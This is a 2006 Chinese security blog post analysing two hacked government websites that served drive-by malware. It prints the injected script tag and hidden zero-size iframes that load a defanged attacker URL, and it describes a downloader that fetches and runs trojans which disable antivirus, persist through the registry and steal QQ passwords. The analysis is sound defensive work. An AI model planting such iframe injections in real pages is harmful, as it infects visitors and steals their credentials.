两个会自动下载恶意程序文件的政府网站

endurer　原创

2006-08-18　第1版

打开这两个网站时，Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。

第一个网站 hxxp://www.jing***.gov.cn的首页加入代码：
--------
＜TR＞＜script language=javascript src=bbs.js＞＜/script＞
＜TD vAlign=top align=right width="48%"＞
--------

bbs.js的内容为：
--------
document.write("＜iframe src=hxxp://wzxqy.chao***kuai.com/***1***23/index.htm width=0 height=0＞＜/iframe＞")
--------

hxxp://wzxqy.chao***kuai.com/***1***23/index.htm 的内容为JavaScript脚本，由于其中包含了攻击者所属组织和QQ号，所里不公开具体内容。

该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://wzxqy.chao***kuai.com/***1***23/123.exe， 保存为 IE临时文件夹中的 winlogin.exe，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。（这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫  中第二段脚本程序相似）

123.exe 下载两个文件：

hxxp://wzxqy***01.vip***6.25idc.cn/1***/888.exe （Kaspersky 报为 Backdoor.Win32.Hupigon.byq）

hxxp://wzxqy***01.vip***6.25idc.cn/1***/777.exe （Kaspersky 报为 Trojan-PSW.Win32.QQRob.hf）

777.exe 会：
1、终止瑞星实时监控中心，强行关闭瑞星杀毒软件窗口，删除瑞星在注册表中的开机启动项，如RavTask
2、把自己复制为%windir%/system32/NTdHcP.exe，并运行
3、修改注册表，在 [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下创建键"NTdhcp"，其值为："C:/WINDOWS/System32/NTdhcp.exe"
（endurer注：c:/windows是Windows系统文件夹路径，在不同的电脑中可能不同）
4、终止QQ进程，盗取QQ密码

第二个网站 hxxp://www.hj***.gov.cn的首页末被直接加入代码：
--------
＜iframe src="hxxp://wzxqy.chao***kuai.Qcom/***1***23/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"＞＜/iframe＞
--------

经分析发现两个网站在同一个服务器上，因此被加入同一恶意代码也就不足为奇了。